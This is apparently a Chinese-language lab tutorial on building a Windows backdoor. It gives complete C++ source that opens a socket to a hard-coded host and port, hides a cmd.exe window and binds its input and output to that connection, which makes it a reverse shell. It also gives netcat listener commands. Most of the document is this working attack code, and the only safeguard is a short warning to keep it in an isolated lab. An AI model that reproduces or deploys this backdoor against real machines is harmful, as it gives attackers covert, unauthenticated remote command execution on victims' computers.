零管道返回cmdshell


零管道返回cmdshell


192.168.139.128 为虚拟机(监听端)的 IP 地址;程序中把它和端口 8888 硬编码为回连地址,换环境时需要同步修改源码。

实验步骤:

1. 在虚拟机中运行 nc -l -v -p 8888 进行监听(端口必须与程序中硬编码的 8888 一致)

2. 运行编译好的程序

连接建立后,虚拟机上的 nc 会先收到 "backdoor start" 字样,随后得到实体机 cmd.exe 的交互式 shell。注意:这条连接既无认证也无加密,任何能在该地址监听的人都能拿到 shell,只应在隔离的实验环境中运行。


// ZeroPipeBackdoor.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include <winsock2.h>#pragma comment(lib, "WS2_32.lib")// 链接到WS2_32.libvoid cmdshell(SOCKET s){char szSysDir[MAX_PATH] = {0};GetSystemDirectory(szSysDir, MAX_PATH);strcat(szSysDir, "\\cmd.exe");STARTUPINFO si = {0};GetStartupInfo(&si);si.wShowWindow = SW_HIDE;si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;PROCESS_INFORMATION pi = {0};::CreateProcess(NULL, szSysDir, NULL, NULL, true, 0, NULL, NULL, &si, &pi );::WaitForSingleObject(pi.hProcess, INFINITE);}int main(int argc, char* argv[]){char MyMessage[512] = {0};strcpy(MyMessage, "backdoor start");// 初始化WS2_32.dllWSADATA wsaData;WORD sockVersion = MAKEWORD(2, 2);if(::WSAStartup(sockVersion, &wsaData) != 0){return -1;}SOCKETs = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);if (s == INVALID_SOCKET){return -1;}sockaddr_in sin;sin.sin_family = AF_INET;sin.sin_port = htons(8888);sin.sin_addr.S_un.S_addr = inet_addr("192.168.139.128");if ( connect(s, (sockaddr*)&sin, sizeof(sin)) == -1 ){int nErr = GetLastError();return -1;}if (send(s, MyMessage, sizeof(MyMessage), 0) == SOCKET_ERROR){printf("send error");return -1;}cmdshell(s);printf("Hello World!\n");return 0;}